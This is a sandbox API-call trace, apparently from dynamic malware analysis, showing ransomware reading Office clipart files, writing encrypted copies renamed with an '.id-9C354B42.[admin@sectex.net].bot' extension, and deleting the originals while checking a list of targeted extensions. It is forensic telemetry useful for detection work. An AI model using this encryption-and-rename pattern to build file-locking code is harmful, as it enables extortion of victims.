	[0163.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107734.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107734.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.115] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.115] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107734.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.117] GetLastError () returned 0x0
	[0163.117] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xc44, lpOverlapped=0x0) returned 1
	[0163.118] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xc50, lpOverlapped=0x0) returned 1
	[0163.119] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.119] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.119] SetEndOfFile (hFile=0x37c) returned 1
	[0163.119] CloseHandle (hObject=0x37c) returned 1
	[0163.119] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.119] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.122] CloseHandle (hObject=0x1b4) returned 1
	[0163.122] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.122] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107734.wmf")) returned 1
	[0163.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.123] lstrlenW (lpString=".doc") returned 4
	[0163.123] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.123] lstrlenW (lpString=".docx") returned 5
	[0163.123] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0163.123] lstrlenW (lpString=".pdf") returned 4
	[0163.123] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.123] lstrlenW (lpString=".xls") returned 4
	[0163.123] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.123] lstrlenW (lpString=".xlsx") returned 5
	[0163.123] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0163.123] lstrlenW (lpString=".ppt") returned 4
	[0163.123] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.123] lstrlenW (lpString=".zip") returned 4
	[0163.123] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.123] lstrlenW (lpString=".rar") returned 4
	[0163.123] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.123] lstrlenW (lpString=".bz2") returned 4
	[0163.123] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.123] lstrlenW (lpString=".7z") returned 3
	[0163.123] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.123] lstrlenW (lpString=".dbf") returned 4
	[0163.123] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.123] lstrlenW (lpString=".1cd") returned 4
	[0163.123] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.123] lstrlenW (lpString=".jpg") returned 4
	[0163.124] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.124] lstrlenW (lpString=".doc") returned 4
	[0163.124] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.124] lstrlenW (lpString=".docx") returned 5
	[0163.124] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0163.124] lstrlenW (lpString=".pdf") returned 4
	[0163.124] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.124] lstrlenW (lpString=".xls") returned 4
	[0163.124] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.124] lstrlenW (lpString=".xlsx") returned 5
	[0163.124] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0163.124] lstrlenW (lpString=".ppt") returned 4
	[0163.124] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.124] lstrlenW (lpString=".zip") returned 4
	[0163.124] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.124] lstrlenW (lpString=".rar") returned 4
	[0163.124] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.124] lstrlenW (lpString=".bz2") returned 4
	[0163.124] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.124] lstrlenW (lpString=".7z") returned 3
	[0163.124] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.124] lstrlenW (lpString=".dbf") returned 4
	[0163.124] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.124] lstrlenW (lpString=".1cd") returned 4
	[0163.124] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.124] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF") returned 63
	[0163.124] lstrlenW (lpString=".jpg") returned 4
	[0163.124] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.125] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.125] lstrlenW (lpString="J0107742.WMF") returned 12
	[0163.125] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.125] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3644) returned 1
	[0163.125] CloseHandle (hObject=0x1b4) returned 1
	[0163.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf")) returned 0x20
	[0163.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.126] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.126] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.126] GetLastError () returned 0x0
	[0163.126] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xe3c, lpOverlapped=0x0) returned 1
	[0163.128] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xe40, lpOverlapped=0x0) returned 1
	[0163.129] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.129] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.129] SetEndOfFile (hFile=0x37c) returned 1
	[0163.129] CloseHandle (hObject=0x37c) returned 1
	[0163.129] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.129] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.131] CloseHandle (hObject=0x1b4) returned 1
	[0163.131] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.131] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107742.wmf")) returned 1
	[0163.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.132] lstrlenW (lpString=".doc") returned 4
	[0163.132] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.132] lstrlenW (lpString=".docx") returned 5
	[0163.132] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0163.132] lstrlenW (lpString=".pdf") returned 4
	[0163.132] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.132] lstrlenW (lpString=".xls") returned 4
	[0163.132] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.132] lstrlenW (lpString=".xlsx") returned 5
	[0163.132] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0163.132] lstrlenW (lpString=".ppt") returned 4
	[0163.132] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.132] lstrlenW (lpString=".zip") returned 4
	[0163.132] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.132] lstrlenW (lpString=".rar") returned 4
	[0163.133] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.133] lstrlenW (lpString=".bz2") returned 4
	[0163.133] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.133] lstrlenW (lpString=".7z") returned 3
	[0163.133] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.133] lstrlenW (lpString=".dbf") returned 4
	[0163.133] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.133] lstrlenW (lpString=".1cd") returned 4
	[0163.133] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.133] lstrlenW (lpString=".jpg") returned 4
	[0163.133] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.133] lstrlenW (lpString=".doc") returned 4
	[0163.133] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.133] lstrlenW (lpString=".docx") returned 5
	[0163.133] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0163.133] lstrlenW (lpString=".pdf") returned 4
	[0163.133] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.133] lstrlenW (lpString=".xls") returned 4
	[0163.133] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.133] lstrlenW (lpString=".xlsx") returned 5
	[0163.133] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0163.133] lstrlenW (lpString=".ppt") returned 4
	[0163.133] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.133] lstrlenW (lpString=".zip") returned 4
	[0163.133] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.133] lstrlenW (lpString=".rar") returned 4
	[0163.133] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.133] lstrlenW (lpString=".bz2") returned 4
	[0163.134] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.134] lstrlenW (lpString=".7z") returned 3
	[0163.134] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.134] lstrlenW (lpString=".dbf") returned 4
	[0163.134] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.134] lstrlenW (lpString=".1cd") returned 4
	[0163.134] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107742.WMF") returned 63
	[0163.134] lstrlenW (lpString=".jpg") returned 4
	[0163.134] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.134] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.134] lstrlenW (lpString="J0107744.WMF") returned 12
	[0163.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.135] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5004) returned 1
	[0163.135] CloseHandle (hObject=0x1b4) returned 1
	[0163.135] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf")) returned 0x20
	[0163.135] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.136] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.136] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.136] GetLastError () returned 0x0
	[0163.137] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x138c, lpOverlapped=0x0) returned 1
	[0163.138] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1390, lpOverlapped=0x0) returned 1
	[0163.139] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.139] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.139] SetEndOfFile (hFile=0x37c) returned 1
	[0163.140] CloseHandle (hObject=0x37c) returned 1
	[0163.140] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.140] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.142] CloseHandle (hObject=0x1b4) returned 1
	[0163.142] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.142] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107744.wmf")) returned 1
	[0163.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.143] lstrlenW (lpString=".doc") returned 4
	[0163.143] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.143] lstrlenW (lpString=".docx") returned 5
	[0163.143] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0163.143] lstrlenW (lpString=".pdf") returned 4
	[0163.143] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.143] lstrlenW (lpString=".xls") returned 4
	[0163.143] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.143] lstrlenW (lpString=".xlsx") returned 5
	[0163.143] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0163.143] lstrlenW (lpString=".ppt") returned 4
	[0163.143] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.143] lstrlenW (lpString=".zip") returned 4
	[0163.143] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.143] lstrlenW (lpString=".rar") returned 4
	[0163.143] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.143] lstrlenW (lpString=".bz2") returned 4
	[0163.143] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.143] lstrlenW (lpString=".7z") returned 3
	[0163.143] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.143] lstrlenW (lpString=".dbf") returned 4
	[0163.143] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.143] lstrlenW (lpString=".1cd") returned 4
	[0163.143] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.143] lstrlenW (lpString=".jpg") returned 4
	[0163.144] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.144] lstrlenW (lpString=".doc") returned 4
	[0163.144] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.144] lstrlenW (lpString=".docx") returned 5
	[0163.144] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0163.144] lstrlenW (lpString=".pdf") returned 4
	[0163.144] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.144] lstrlenW (lpString=".xls") returned 4
	[0163.144] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.144] lstrlenW (lpString=".xlsx") returned 5
	[0163.144] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0163.144] lstrlenW (lpString=".ppt") returned 4
	[0163.144] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.144] lstrlenW (lpString=".zip") returned 4
	[0163.144] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.144] lstrlenW (lpString=".rar") returned 4
	[0163.144] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.144] lstrlenW (lpString=".bz2") returned 4
	[0163.144] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.144] lstrlenW (lpString=".7z") returned 3
	[0163.144] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.144] lstrlenW (lpString=".dbf") returned 4
	[0163.144] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.144] lstrlenW (lpString=".1cd") returned 4
	[0163.144] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107744.WMF") returned 63
	[0163.144] lstrlenW (lpString=".jpg") returned 4
	[0163.144] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.145] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.145] lstrlenW (lpString="J0107746.WMF") returned 12
	[0163.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.145] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4788) returned 1
	[0163.145] CloseHandle (hObject=0x1b4) returned 1
	[0163.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf")) returned 0x20
	[0163.145] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107746.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107746.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
